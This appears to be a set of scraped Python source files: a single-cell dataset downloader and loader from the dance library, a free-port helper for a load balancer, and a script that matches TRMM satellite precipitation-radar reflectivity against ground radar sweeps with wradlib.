get_map_dict(map_file_path: str, tissue: str) -> Dict[str, Set[str]]:\n \"\"\"Load cell-type mappings.\n\n Parameters\n ----------\n map_file_path\n Path to the mapping file.\n tissue\n Tissue of interest.\n\n Notes\n -----\n Merge mapping across all test sets for the required tissue.\n\n \"\"\"\n map_df = pd.read_excel(osp.join(map_file_path, \"map.xlsx\"))\n map_dict = collections.defaultdict(set)\n for _, row in map_df.iterrows():\n if row[\"Tissue\"] == tissue:\n map_dict[row[\"Celltype\"]].add(row[\"Training dataset cell type\"])\n return dict(map_dict)\n\n\n@register_dataset(\"clustering\")\nclass ClusteringDataset(BaseDataset):\n \"\"\"Data downloading and loading for clustering.\n\n Parameters\n ----------\n data_dir\n Path to store datasets.\n dataset\n Choice of dataset. Available options are '10X_PBMC', 'mouse_bladder_cell', 'mouse_ES_cell', 'worm_neuron_cell'.\n\n \"\"\"\n\n URL_DICT = load_data_url_dict_from_csv(METADIR / \"clustering.csv\")\n AVAILABLE_DATA = sorted(URL_DICT)\n\n def __init__(self, data_dir: str = \"./data\", dataset: str = \"mouse_bladder_cell\"):\n super().__init__(data_dir, full_download=False)\n self.data_dir = data_dir\n self.dataset = dataset\n\n @property\n def data_path(self) -> str:\n return osp.join(self.data_dir, f\"{self.dataset}.h5\")\n\n def download(self):\n download_file(self.URL_DICT[self.dataset], self.data_path)\n\n def is_complete(self):\n return osp.exists(self.data_path)\n\n def _load_raw_data(self) -> Tuple[ad.AnnData, np.ndarray]:\n with h5py.File(self.data_path, \"r\") as f:\n x = np.array(f[\"X\"])\n y = np.array(f[\"Y\"])\n adata = ad.AnnData(x, dtype=np.float32)\n return adata, y\n\n def _raw_to_dance(self, raw_data: Tuple[ad.AnnData, np.ndarray]):\n adata, y = raw_data\n adata.obsm[\"Group\"] = y\n data = Data(adata, train_size=\"all\")\n return data\n\n\n@register_dataset(\"imputation\")\nclass ImputationDataset(BaseDataset):\n URL = load_data_url_dict_from_csv(METADIR / \"imputation.csv\")\n DATASET_TO_FILE =IMPUTATION_DATASET_TO_FILE # yapf: disable\n AVAILABLE_DATA = sorted(URL)\n\n def __init__(self, data_dir=\"data\", dataset=\"human_stemcell\", train_size=0.1):\n super().__init__(data_dir, full_download=False)\n self.data_dir = data_dir\n self.dataset = dataset\n self.train_size = train_size\n\n def download(self):\n\n gene_class = [\n \"pbmc_data\", \"mouse_brain_data\", \"mouse_embryo_data\", \"human_stemcell_data\", \"human_breast_TGFb_data\",\n \"human_breast_Dox_data\", \"human_melanoma_data\", \"mouse_visual_data\"\n ]\n\n file_name = {\n \"pbmc_data\": \"5k.zip?dl=0\",\n \"mouse_embryo_data\": \"GSE65525.zip?dl=0\",\n \"mouse_brain_data\": \"neuron_10k.zip?dl=0\",\n \"human_stemcell_data\": \"GSE75748.zip?dl=0\",\n \"human_breast_TGFb_data\": \"GSE114397.zip?dl=0\",\n \"human_breast_Dox_data\": \"GSM3141014.zip?dl=0\",\n \"human_melanoma_data\": \"human_melanoma_data.zip?dl=0\",\n \"mouse_visual_data\": \"mouse_visual_data.zip?dl=0\"\n }\n\n dl_files = {\n \"pbmc_data\": \"5k_*\",\n \"mouse_embryo_data\": \"GSE65525\",\n \"mouse_brain_data\": \"neuron*\",\n \"human_stemcell_data\": \"GSE75748\",\n \"human_breast_TGFb_data\": \"GSE11*\",\n \"human_breast_Dox_data\": \"GSM31*\",\n \"human_melanoma_data\": \"human*\",\n \"mouse_visual_data\": \"GSM27*\"\n }\n\n if sys.platform != 'win32':\n if not osp.exists(self.data_dir):\n os.system(\"mkdir \" + self.data_dir)\n if not osp.exists(self.data_dir + \"/train\"):\n os.system(\"mkdir \" + self.data_dir + \"/train\")\n\n for class_name in gene_class:\n if self.dataset == gene_class:\n if not any(map(osp.exists, glob(osp.join(self.data_dir, \"train\", class_name,\n dl_files[class_name])))):\n os.system(\"mkdir \" + self.data_dir + \"/train/\" + class_name)\n os.system(\"wget \" + self.URL[class_name]) # assumes linux... mac needs to install\n os.system(\"unzip \" + file_name[class_name])\n os.system(\"rm \" + file_name[class_name])\n os.system(\"mv \" + dl_files[class_name] + \" \" + self.data_dir + \"/train/\" + class_name + \"/\")\n os.system(\"cp -r \" + self.data_dir + \"/train/ \" + self.data_dir + \"/test\")\n if sys.platform == 'win32':\n if not osp.exists(self.data_dir):\n os.system(\"mkdir \" + self.data_dir)\n if not osp.exists(self.data_dir + \"/train\"):\n os.mkdir(self.data_dir + \"/train\")\n for class_name in gene_class:\n if self.dataset == gene_class:\n if not any(map(osp.exists, glob(osp.join(self.data_dir, \"train\", class_name,\n dl_files[class_name])))):\n os.mkdir(self.data_dir + \"/train/\" + class_name)\n os.system(\"curl \" + self.URL[class_name])\n os.system(\"tar -xf \" + file_name[class_name])\n os.system(\"del -R \" + file_name[class_name])\n os.system(\"move \" + dl_files[class_name] + \" \" + self.data_dir + \"/train/\" + class_name + \"/\")\n os.system(\"copy /r \" + self.data_dir + \"/train/ \" + self.data_dir + \"/test\")\n\n def is_complete(self):\n # check whether data is complete or not\n check = [\n self.data_dir + \"/train\",\n self.data_dir + \"/test\",\n ]\n\n for i in check:\n if not osp.exists(i):\n logger.info(\"file {} doesn't exist\".format(i))\n return False\n return True\n\n def _load_raw_data(self) -> ad.AnnData:\n if self.dataset[-5:] != '_data':\n dataset = self.dataset + '_data'\n else:\n dataset = self.dataset\n\n if self.dataset == 'mouse_embryo' or self.dataset == 'mouse_embryo_data' or self.dataset == \"mouse_visual_data\":\n for i in range(len(self.DATASET_TO_FILE[dataset])):\n fname = self.DATASET_TO_FILE[dataset][i]\n data_path = f'{self.data_dir}/train/{dataset}/{fname}'\n if i == 0:\n counts = pd.read_csv(data_path, header=None, index_col=0)\n time = pd.Series(np.zeros(counts.shape[1]))\n else:\n x = pd.read_csv(data_path, header=None, index_col=0)\n time = pd.concat([time, pd.Series(np.zeros(x.shape[1])) + i])\n counts = pd.concat([counts, x], axis=1)\n time = pd.DataFrame(time)\n time.columns = ['time']\n counts = counts.T\n counts.index = [i for i in range(counts.shape[0])]\n adata = ad.AnnData(csr_matrix(counts.values))\n adata.var_names = counts.columns.tolist()\n adata.obs['time'] = time.to_numpy()\n else:\n data_path = osp.join(self.data_dir, \"train\", dataset, self.DATASET_TO_FILE[dataset])\n if not os.path.exists(data_path):\n raise FileNotFoundError(f\"{data_path} does not exist\")\n\n if self.DATASET_TO_FILE[dataset][-3:] == 'csv':\n counts = pd.read_csv(data_path, header=None, index_col=0)\n nums = pd.Series(np.arange(counts.shape[1]))\n nums = pd.DataFrame(nums)\n nums.columns = ['nums']\n counts = counts.T\n counts.index = [i for i in range(counts.shape[0])]\n adata = ad.AnnData(csr_matrix(counts.values))\n adata.var_names = counts.columns.tolist()\n adata.obs['nums'] = nums.to_numpy()\n if self.DATASET_TO_FILE[dataset][-2:] == 'gz':\n counts = pd.read_csv(data_path, index_col=0, compression='gzip', header=0)\n counts = counts.T\n adata = ad.AnnData(csr_matrix(counts.values))\n # adata.obs_names = [\"%d\" % i for i in range(adata.shape[0])]\n adata.obs_names = counts.index.tolist()\n adata.var_names = counts.columns.tolist()\n elif self.DATASET_TO_FILE[dataset][-2:] == 'h5':\n adata = sc.read_10x_h5(data_path)\n adata.var_names_make_unique()\n\n return adata\n\n def _raw_to_dance(self, raw_data: ad.AnnData):\n adata = raw_data\n data = Data(adata, train_size=int(adata.n_obs * self.train_size))\n return data\n","repo_name":"OmicsML/dance","sub_path":"dance/datasets/singlemodality.py","file_name":"singlemodality.py","file_ext":"py","file_size_in_byte":18268,"program_lang":"python","lang":"en","doc_type":"code","stars":269,"dataset":"github-code","pt":"53"} +{"seq_id":"4384639515","text":"# chose a random server from machines.json\nimport random\nimport logging\nimport socket\nlogging.basicConfig(level=logging.INFO)\n\n\ndef get_free_port():\n while True:\n port = random.randint(32768, 61000)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if sock.connect_ex(('127.0.0.1', port)): # returns non-zero if connection is unsuccessful -> port is free\n return port\n else:\n sock.close()\n","repo_name":"harikrishnanum/Distributed-IOT-ML-Platform","sub_path":"deployer/deployer/load_balancer/loadbalancer.py","file_name":"loadbalancer.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28268455432","text":"import wradlib as wradlib\nimport matplotlib.pyplot as pl\nimport matplotlib as mpl\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.colors import from_levels_and_colors\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport matplotlib.cm as cm\nimport warnings\nwarnings.filterwarnings('ignore')\ntry:\n get_ipython().magic(\"matplotlib inline\")\nexcept:\n pl.ion()\nimport numpy as np\nimport datetime as dt\nfrom osgeo import osr\nfrom osgeo import gdal\nimport wradlib as wrl\nimport datetime as dt\nimport numpy as np\nfrom wradlib.io import read_generic_netcdf\nfrom wradlib.util import get_wradlib_data_file\nimport os\nfrom external import *\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport numpy as np\nimport scipy.io as sio\nfrom pyhdf.SD import SD, SDC\ndef read_trmm_pyhdf(filename1, filename2):\n\n hdf=SD(filename1, SDC.READ)\n hdf_1 = SD(filename2, SDC.READ)\n lat = hdf.select('Latitude')\n lat = lat[:,:]\n lon = hdf.select('Longitude')\n lon = lon[:,:]\n year = hdf.select('Year')\n year = year[:]\n month = hdf.select('Month')\n month = month[:]\n dayofmonth = hdf.select('DayOfMonth')\n dayofmonth = dayofmonth[:]\n dayofyear = hdf.select('DayOfYear')\n dayofyear = dayofyear[:]\n hour = hdf.select('Hour')\n hour=hour[:]\n minute = hdf.select('Minute')\n minute=minute[:]\n second = hdf.select('Second')\n second = second[:]\n millisecond = hdf.select('MilliSecond')\n millisecond=millisecond[:]\n date_array = zip(year, month, dayofmonth,\n hour, minute, second,\n millisecond.astype(np.int32) * 1000)\n pr_time = np.array([dt.datetime(d[0], d[1], d[2], d[3], d[4], d[5], d[6]) for d in\n date_array])\n status = hdf.select('status')\n status = status[:,:]\n pflag = hdf.select('rainFlag') \n pflag = pflag[:,:]\n ptype = hdf.select('rainType') \n ptype = pflag[:,:]\n zbb = hdf.select('HBB')\n zbb = zbb[:,:].astype(np.float32)\n bbwidth = hdf.select('BBwidth')\n bbwidth = bbwidth[:,:].astype(np.float32)\n bbstatus = hdf.select('BBstatus')\n bbstatus = bbstatus[:,:]\n refl = hdf_1.select('correctZFactor')\n refl = refl[:,:].astype(np.float32)\n refl[refl == -8888.] = np.nan\n refl[refl == -9999.] = np.nan\n refl = refl / 100.\n quality = hdf_1.select('dataQuality')\n quality = quality[:]\n\n # Check for bad data\n if max(quality) != 0:\n raise ValueError('TRMM contains Bad Data')\n\n # Determine the dimensions\n ndim = refl.ndim\n if ndim != 3:\n raise ValueError('TRMM Dimensions do not match!'\n 'Needed 3, given {0}'.format(ndim))\n\n tmp = refl.shape\n nscan = tmp[0]\n nray = tmp[1]\n nbin = tmp[2]\n\n # Reverse direction along the beam\n # TODO: Why is this reversed?\n refl = refl[::-1]\n\n # Simplify the precipitation flag\n ipos = (pflag >= 10) & (pflag < 20)#check when not using equal to\n icer = (pflag == 20)\n pflag[ipos] = 1\n pflag[icer] = 2\n\n # Simplify the precipitation types\n istr = (ptype >= 100) & (ptype <= 200)\n icon = (ptype >= 200) & (ptype <= 300)\n ioth = (ptype >= 300)\n inone = (ptype == -88)\n imiss = (ptype == -99)\n ptype[istr] = 1 #type of rain stratiform \n ptype[icon] = 2 #type of rain convective\n ptype[ioth] = 3 #type of rain other type\n ptype[inone] = 0\n ptype[imiss] = -1\n\n # Extract the surface type #modify\n sfc = np.zeros((nscan, nray), dtype=np.uint8)\n i0 = (status % 10 == 0)\n sfc[i0] = 0 #ocean\n i1 = ((status - 1) % 10 == 0)\n sfc[i1] = 1 #land\n i2 = ((status - 2) % 10 == 0)\n sfc[i2] = 2 #coastline\n i3 = ((status - 4) % 10 == 0)\n sfc[i3] = 4 #inland lake\n i9 = ((status - 9) % 10 == 0)\n sfc[i9] = 9 #inland\n \n # bright band detection status\n #bb_detection_status = np.zeros((nscan, nray), dtype=np.uint8)\n #bb_detection_status[bbstatus == -11] = 0\n #k_1 = (0 < (bbstatus/16)) & ((bbstatus/16) < 50)\n #bb_detection_status[k_1] = 1\n #k_2 = (50 < (bbstatus/16)) & ((bbstatus/16) < 109)\n #bb_detection_status[k_2] = 2\n# Extract 2A23 quality\n# TODO: Why is the `quality` variable overwritten?\n# quality = np.zeros((nscan, nray), dtype=np.uint8)\n# i0 = (status == 168)\n# quality[i0] = 0\n #i1 = ((bb_detection_status == 0) | (bb_detection_status == 1)) & (ptype == 1)\n #quality[i1] = 1\n #i2 = (bb_detection_status > 1) & (ptype >= 1)\n #quality[i2] = 2\n quality = np.zeros((nscan, nray), dtype=np.uint8)\n i0 = (status == 168)\n quality[i0] = 0\n i1 = (status < 50)\n quality[i1] = 1\n i2 = ((status >= 50) & (status < 109))\n quality[i2] = 2\n trmm_data = {}\n trmm_data.update({'nscan': nscan, 'nray': nray, 'nbin': nbin,\n 'date': pr_time, 'lon': lon, 'lat': lat,\n 'pflag': pflag, 'ptype': ptype, 'zbb': zbb,\n 'bbwidth': bbwidth, 'sfc': sfc, 'quality': quality,\n 'refl': refl, 'bbstatus': bbstatus})\n return trmm_data\n\ndef _get_tilts(dic):\n i = 0\n for k in dic.keys():\n if 'dataset' in k:\n i += 1\n return i\n\ndef read_gr(filename, loaddata=True):\n\n gr_data = wrl.io.read_generic_netcdf(filename)\n dat = gr_data['what']['date']\n tim = gr_data['what']['time']\n date = dt.datetime.strptime(dat + tim, \"%Y%d%m%H%M%S\")\n source = gr_data['what']['source']\n\n lon = gr_data['where']['lon']\n lat = gr_data['where']['lat']\n alt = gr_data['where']['height']\n\n if gr_data['what']['object'] == 'PVOL':\n ntilt = _get_tilts(gr_data)\n else:\n raise ValueError('GR file is no PPI/Volume File')\n\n ngate = np.zeros(ntilt, dtype=np.int16)\n nbeam = np.zeros(ntilt)\n elang = np.zeros(ntilt)\n r0 = np.zeros(ntilt)\n dr = np.zeros(ntilt)\n a0 = np.zeros(ntilt)\n\n for i in range(0, ntilt):\n dset = gr_data['dataset{0}'.format(i+1)]\n a0[i] = dset['how']['astart']\n elang[i] = dset['where']['elangle']\n ngate[i] = dset['where']['nbins']\n r0[i] = dset['where']['rstart']\n dr[i] = dset['where']['rscale']\n nbeam[i] = dset['where']['nrays']\n\n if ((len(np.unique(r0)) != 1) |\n (len(np.unique(dr)) != 1) |\n (len(np.unique(a0)) != 1) |\n (len(np.unique(nbeam)) != 1) |\n (nbeam[0] != 360)):\n raise ValueError('GroundRadar Data layout dos not match')\n\n gr_dict = {}\n gr_dict.update({'source': source, 'date': date, 'lon': lon, 'lat': lat,\n 'alt': alt, 'ngate': ngate, 'nbeam': nbeam, 'ntilt': ntilt,\n 'r0': r0, 'dr': dr, 'a0': a0, 'elang': elang})\n if not loaddata:\n return gr_dict\n\n sdate = []\n refl = []\n for i in range(0, ntilt):\n dset = gr_data['dataset{0}'.format(i+1)]\n dat = dset['what']['startdate']\n tim = dset['what']['starttime']\n date = dt.datetime.strptime(dat + tim, \"%Y%d%m%H%M%S\")\n sdate.append(date)\n data = dset['data1']\n quantity = data['what']['quantity']\n factor = data['what']['gain']\n offset = data['what']['offset']\n if quantity == 'DBZH':\n dat = data['variables']['data']['data'] * factor + offset\n refl.append(dat)\n\n sdate = np.array(sdate)\n refl = np.array(refl)\n\n gr_dict.update({'sdate': sdate, 'refl': refl})\n\n return gr_dict\n\n# Set parameters for this procedure\nbw_pr = 0.71 # PR beam width\nplatf = \"trmm\" # PR platform/product: one out of [\"gpm\", \"trmm_2a23\", \"trmm_2a25\"]\nzt = pr_pars[platf][\"zt\"] # PR orbit height (meters)\ndr_pr = pr_pars[platf][\"dr\"] # PR gate length (meters)\nee = 2\n\n# define GPM data set\n#gpm_file = wradlib.util.get_wradlib_data_file('gpm/2A-RW-BRS.GPM.Ku.V6-20160118.20141206-S095002-E095137.004383.V04A.HDF5')\n\n# define matching ground radar file\ngr2gpm_file = wradlib.util.get_wradlib_data_file('hdf5/IDR66_20141206_094829.vol.h5')\n\n# define TRMM data sets\ntrmm_2a23_file = wradlib.util.get_wradlib_data_file('trmm/2A-CS-151E24S154E30S.TRMM.PR.2A23.20100206-S111425-E111526.069662.7.HDF')\ntrmm_2a25_file = wradlib.util.get_wradlib_data_file('trmm/2A-CS-151E24S154E30S.TRMM.PR.2A25.20100206-S111425-E111526.069662.7.HDF')\n\n# define matching ground radar file\ngr2trmm_file = wradlib.util.get_wradlib_data_file('hdf5/IDR66_20100206_111233.vol.h5')\n#alok_file_a=trmm_2a23_file[-11:-6]\n#alok_file_b=trmm_2a23_file[-20:-11]\n#alok_file_c=gr2trmm_file[-10:-2]\n#alok_file_d=alok_file_c+alok_file_b+alok_file_a\n#alok_file_coord='coordinates.'+alok_file_d+'.mat'\n#alok_file_refl='reflectivity.'+alok_file_d+'.mat'\n#alok_file_refl_text_file='reflectivity.'+alok_file_d+'.txt'\n#overpass_orbit=['88616','88738','89028','89138','89486','89547','89608','89611','89669','89718']\n#overpass_orbit_time=[1.0, -2.0, -3.0, -3.0, 0.0, -4.0, 0.0, -3.0, -5.0, -1.0]\n#for ii in range(len(overpass_orbit)):\n# if (overpass_orbit[ii]==trmm_2a23_file[-11:-6]):\n# time_diff_for_orbit=overpass_orbit_time[ii]\n#sweep_no=alok_file_c[-3:-1]\n#sweep_no=float(sweep_no)\n#if sweep_no>1.0:\n# time_diff_for_orbit=time_diff_for_orbit+(sweep_no-1)\n#else:\n# time_diff_for_orbit=time_diff_for_orbit\n\n# read matching GR data\nif platf == \"gpm\":\n gr_data = read_gr2(gr2gpm_file)\nelif platf==\"trmm\":\n gr_data = read_gr(gr2trmm_file)\nelse:\n raise(\"Invalid platform\")\n\n# number of rays in gr sweep\nnray_gr = gr_data['nbeam'].astype(\"i4\")[ee]\n# number of gates in gr beam\nngate_gr = gr_data['ngate'].astype(\"i4\")[ee]\n# number of sweeps\nnelev = gr_data['ntilt']\n# elevation of sweep (degree)\nelev = gr_data['elang'][ee]\n# gate length (meters)\ndr_gr = gr_data['dr'][ee]\n# reflectivity array of sweep\nref_gr = gr_data['refl'][ee]\n# sweep datetime stamp\ndate_gr = gr_data['sdate'][ee]\n# range of first gate\nr0_gr = gr_data['r0'][ee]\n# azimuth angle of first beam\na0_gr = gr_data['a0'][ee]\n# Longitude of GR\nlon0_gr = gr_data['lon']\n# Latitude of GR\nlat0_gr = gr_data['lat']\n# Altitude of GR (meters)\nalt0_gr = gr_data['alt']\n# Beam width of GR (degree)\nbw_gr = 1.\nprint(elev, lon0_gr)\n\n# read spaceborn PR data\nif platf == \"gpm\":\n pr_data = read_gpm(gpm_file)\nelif platf == \"trmm\":\n pr_data = read_trmm_pyhdf(trmm_2a23_file, trmm_2a25_file)\nelse:\n raise(\"Invalid platform\")\nrefl = pr_data['refl']\n#print(refl)\n# Longitudes of PR scans\npr_lon = pr_data['lon']\n# Latitudes of PR scans\npr_lat = pr_data['lat']\n# Precip flag\npflag = pr_data['pflag']\n# Number of scans on PR data\nnscan_pr= pr_data['nscan']\n# Number of rays in one PR scan\nnray_pr = pr_data['nray']\n# Number of gates in one PR ray\nngate_pr = pr_data['nbin']\n# Precipiation type\nprecipitation_type = pr_data['ptype']\n##\n# Calculate equivalent earth radius\nwgs84 = wradlib.georef.get_default_projection()\nre1 = wradlib.georef.get_earth_radius(lat0_gr, wgs84) * 4./3.\nprint(\"eff. Earth radius 1:\", re1)\na = wgs84.GetSemiMajor()\nb = wgs84.GetSemiMinor()\nprint(\"SemiMajor, SemiMinor:\", a, b)\n\n# Set up aeqd-projection gr-centered\nrad = wradlib.georef.proj4_to_osr(('+proj=aeqd +lon_0={lon:f} ' + \n '+lat_0={lat:f} +a={a:f} ' +\n '+b={b:f}').format(lon=lon0_gr,\n lat=lat0_gr,\n a=a, b=b))\nre2 = wradlib.georef.get_earth_radius(lat0_gr, rad) * 4./3.\nprint(\"eff. Earth radius 2:\", re2)\n\n# TODO: Seperate the insides of wradlib.georef.polar2lonlatalt_n \n\n# create gr range and azimuth arrays\nrmax_gr = r0_gr + ngate_gr * dr_gr\nr_gr = np.arange(0, ngate_gr) * dr_gr + dr_gr/2.\naz_gr = np.arange(0, nray_gr) - a0_gr\nprint(\"Range/Azi-Shape:\", r_gr.shape, az_gr.shape)\n\n# create gr lonlat grid ##alok modified (check for lat lon grid)\ngr_polargrid = np.meshgrid(r_gr, az_gr)\n## alok modified (check for lat lon grid) gr_lon, gr_lat, gr_alt = wradlib.georef.polar2lonlatalt_n(gr_polargrid[0], gr_polargrid[1], elev, (lon0_gr, lat0_gr, alt0_gr ))\n## alok modified (check for lat lon grid) gr_ll = np.dstack((gr_lon, gr_lat, gr_alt))\n## alok modified (check for lat lon grid) print(\"LonLatAlt-Grid-Shape\", gr_ll.shape)\n\n# reproject to xyz\n## alok modified (check for lat lon grid) gr_xyz = wradlib.georef.reproject(gr_ll, projection_source=wgs84, projection_target=rad)\ngr_xyz,rad = wradlib.georef.spherical_to_xyz(gr_polargrid[0], gr_polargrid[1], elev, (lon0_gr, lat0_gr, alt0_gr )) ## alok modified (check for lat lon grid)\nprint(\"XYZ-Grid-Shape:\", gr_xyz.shape)\n\n# get radar domain (outer ring)\ngr_domain = gr_xyz[:,-1,0:2]\ngr_domain = np.vstack((gr_domain, gr_domain[0]))\nprint(\"Domain-Shape:\", gr_domain.shape)\n\npr_x, pr_y = wradlib.georef.reproject(pr_lon, pr_lat, \n projection_source=wgs84, \n projection_target=rad)\npr_xy = np.dstack((pr_x, pr_y))\nprint(\"PR-GRID-Shapes:\", pr_x.shape, pr_y.shape, pr_xy.shape)\n\n# Create ZonalData for spatial subsetting (inside GR range domain)\n## alok modified (14/1/2019) l_gr = []\n## alok modified (14/1/2019) l_gr.append(gr_domain)\n## alok modified (14/1/2019) zd = wradlib.zonalstats.ZonalDataPoint(pr_xy.reshape(-1, pr_xy.shape[-1]), l_gr, srs=rad, buf=500.)\n## alok modified (14/1/2019) obj1 = wradlib.zonalstats.GridPointsToPoly(zd)\n\n# Get source indices within GR-Domain from zonal object\n# (0 because we have only one zone)\n## alok modified (14/1/2019) pr_idx = obj1.zdata.get_source_index(0) \n\n# Subsetting in order to use only precipitating profiles\n## alok modified (14/1/2019) src_idx = np.zeros_like(pflag, dtype=np.bool)\n## alok modified (14/1/2019) mask = np.unravel_index(pr_idx, pflag.shape)\n## alok modified (14/1/2019) src_idx[mask] = True\n\n# get precip indexes\n## alok modified (14/1/2019) precip_mask = (pflag == 2)\n## alok modified (14/1/2019) precip_idx = src_idx & precip_mask\nprecip_mask = (pflag == 2) & wrl.zonalstats.get_clip_mask(pr_xy, gr_domain, rad)\n## pl.imshow(precip_mask)\n# get iscan/iray boolean arrays\n## alok modified (14/1/2019) iscan = precip_idx.nonzero()[0]\n## alok modified (14/1/2019) iray = precip_idx.nonzero()[1]\niscan = precip_mask.nonzero()[0]\niray = precip_mask.nonzero()[1]\n\nprint(\"NRAY\", nray_pr)\nprint(\"NBIN\", ngate_pr)\n\n# Approximation!\nalpha = abs(-17.04 + np.arange(nray_pr) * bw_pr)\n\n# Correct for parallax, get 3D-XYZ-Array\n# xyzp_pr: Parallax corrected xyz coordinates\n# r_pr_inv: range array from ground to PR platform\n# zp: PR bin altitudes\nxyzp_pr, r_pr_inv, z_pr = correct_parallax(pr_xy, nray_pr, ngate_pr, dr_pr, alpha)\n\nprint(\"PR_XYP:\", xyzp_pr.shape, z_pr.shape)\n#parallax corrected pr values(alok modified)\n# TODO: Do we have to consider refraction in sat2pol?\nr_pr, elev_pr, az_pr = sat2pol(xyzp_pr, (lon0_gr, lat0_gr, alt0_gr), re1)#done \nmask = (elev_pr > (1.0 - bw_gr/2.)) & (elev_pr < (1.0 + bw_gr/2.))#done\n##pl.figure()\n##pl.pcolormesh(mask[90,:,:].T)\n\n# PR pulse volumes\n\n# Range of PR bins\ndists = dist_from_orbit(zt, alpha, r_pr_inv)#done\n\n## Original IDL code...\n## rt=zt/COS(!dtor*alpha)-range\n## volp=(1.e-9)*!pi*(rt*!dtor*bwt/2.)^2*drt\n## Translated to Python\nvol_pr2 = np.pi * dr_pr * (dists * np.radians(bw_pr / 2.))**2\n##fig = pl.figure(figsize=(12,4))\n##pm = pl.pcolor(vol_pr.T)\n##pl.colorbar(pm)\n\n# Or using wradlib's native function\nvol_pr = wradlib.qual.pulse_volume(dists, dr_pr, bw_pr)\n#vol_pr = np.pi * dr_pr * (dists ** 2) * (np.tan(np.radians(bw_pr/2.))) ** 2\n\n# Evaluate difference between both approaches\nprint(\"Min. difference (m3):\", (vol_pr - vol_pr2).min())\nprint(\"Max. difference (m3): \", (vol_pr - vol_pr2).max())\nprint(\"Average rel. difference (%):\", round(np.mean(vol_pr-vol_pr2)*100./np.mean(np.mean(vol_pr2)), 4))\n\n# Verdict: differences are negligble - use wradlibs's native function!\n\n# GR pulse volumes\n# along one beam\nvol_gr = wradlib.qual.pulse_volume(r_gr, dr_gr, bw_gr)#done\n# with shape (nray_gr, ngate_gr)\nvol_gr = np.repeat(vol_gr, nray_gr).reshape((nray_gr,ngate_gr), order=\"F\")#done\n\nratio, zbb, median_bb_height, bb_width = get_bb_ratio(pr_data, z_pr) #bright band height and ratio\n##pl.pcolormesh(ratio[60,:,:].T, vmin=-1, vmax=2)\n##pl.colorbar()\n\n# REVERSE!!!\nrefp = pr_data['refl'][:,:,::-1]\nprint(\"REFP:\", refp.shape)\n\nrefp_ss = np.zeros_like(refp) * np.nan\nrefp_sh = np.zeros_like(refp) * np.nan\n\na_s, a_h = s_ku_coefficients()\n\nia = (ratio >= 1)\nrefp_ss[ia] = refp[ia] + calculate_polynomial(refp[ia], a_s[:,10])\nrefp_sh[ia] = refp[ia] + calculate_polynomial(refp[ia], a_h[:,10])\nib = (ratio <= 0)\nrefp_ss[ib] = refp[ib] + calculate_polynomial(refp[ib], a_s[:,0])\nrefp_sh[ib] = refp[ib] + calculate_polynomial(refp[ib], a_h[:,0])\nim = (ratio > 0) & (ratio < 1)\nind = np.round(ratio[im] * 10).astype(np.int)\n#print(\"W:\", a_s[:,ind].shape)\nrefp_ss[im] = refp[im] + calculate_polynomial(refp[im], a_s[:,ind])\nrefp_sh[im] = refp[im] + calculate_polynomial(refp[im], a_h[:,ind])\n\nrefp_ss[refp < 0] = np.nan\nout = np.ma.masked_invalid(refp_ss)\n##pl.figure()\n##pl.pcolormesh(out[60,:,:].T, vmin=0, vmax=60)\n##pl.colorbar()\n##pl.figure()\n##pl.pcolormesh(refp[60,:,:].T, vmin=0, vmax=60)\n##pl.colorbar()\n##pl.figure()\n##pl.pcolormesh(ratio[60,:,:].T, vmin=-1, vmax=2)\n##pl.colorbar()\n\n# Convert S-band GR reflectivities to Ku-band using method of Liao and Meneghini (2009)\nref_gr_ku = np.zeros_like(ref_gr) * np.nan\n\n# Which zbb value should we take here???\n# Q'n'Dirty: just take the mean of all PR profiles\n# TODO: Consider zbb for each profile during the matching process\n\n# Snow\nia = ( gr_xyz[...,2] >= np.nanmean(zbb) )\nref_gr_ku[ia] = ku2s[\"snow\"][0] + ku2s[\"snow\"][1]*ref_gr[ia] + ku2s[\"snow\"][2]*ref_gr[ia]**2\n\n# Rain\nib = ( gr_xyz[...,2] < np.nanmean(zbb) )\nref_gr_ku[ib] = ku2s[\"rain\"][0] + ku2s[\"rain\"][1]*ref_gr[ib] + ku2s[\"rain\"][2]*ref_gr[ib]**2\n\n# Jackson Tan's fix for C-band\nis_cband = True\nif (is_cband):\n delta = (ref_gr_ku - ref_gr) * 5.3/10.0\n ref_gr_ku = ref_gr + delta\n\n# First assumption: no valid PR bins (all False)\nvalid = np.asarray(elev_pr, dtype=np.bool)==False\n# PR is inside GR range and is precipitating\nvalid[iscan,iray] = True\n# PR bins intersect with GR sweep\nvalid = valid & (elev_pr >= elev-bw_gr/2.) & (elev_pr <= elev+bw_gr/2.)\n# Number of matching PR bins per profile\nnvalids = np.sum(valid, axis=2)\n# scan and ray indices for profiles with at least one valid bin\nvscan, vray = np.where(nvalids>0)\n# number of profiles with at least one valid bin\nnprof = len(vscan)\n# Lots of containers to store samples (only for one GR sweep angle!)\nx = np.zeros(nprof)*np.nan # x coordinate of sample\ny = np.zeros(nprof)*np.nan # y coordinate of sample\nz = np.zeros(nprof)*np.nan # z coordinate of sample\nprecip_type = np.zeros(nprof,dtype=\"i4\")*np.nan #precipitation type\nthreshold_percentage_GR = np.zeros(nprof)*np.nan #threshold percentage for GR\nthreshold_percentage_PR = np.zeros(nprof)*np.nan #threshold percentage for PR\ndz = np.zeros(nprof)*np.nan # depth of sample\nds = np.zeros(nprof)*np.nan # width of sample\nrs = np.zeros(nprof)*np.nan # range of sample from GR\nrefpr1 = np.zeros(nprof)*np.nan # PR reflectivity\nrefpr2 = np.zeros(nprof)*np.nan # PR reflectivity (S-band, snow)\nrefpr3 = np.zeros(nprof)*np.nan # PR reflectivity (S-band, hail) \nrefgr1 = np.zeros(nprof)*np.nan # GR reflectivity\nrefgr2 = np.zeros(nprof)*np.nan # GR reflectivity (Ku-band)\nntotpr = np.zeros(nprof,dtype=\"i4\")# total number of PR bins in sample\nnrej1 = np.zeros(nprof,dtype=\"i4\")# number of rejected PR bins in sample\nntotgr = np.zeros(nprof,dtype=\"i4\")# total number of GR bins in sample\nnrej2 = np.zeros(nprof,dtype=\"i4\")# number of rejected GR bins in sample\niref1 = np.zeros(nprof)*np.nan # path-integrated PR reflectivity\niref2 = 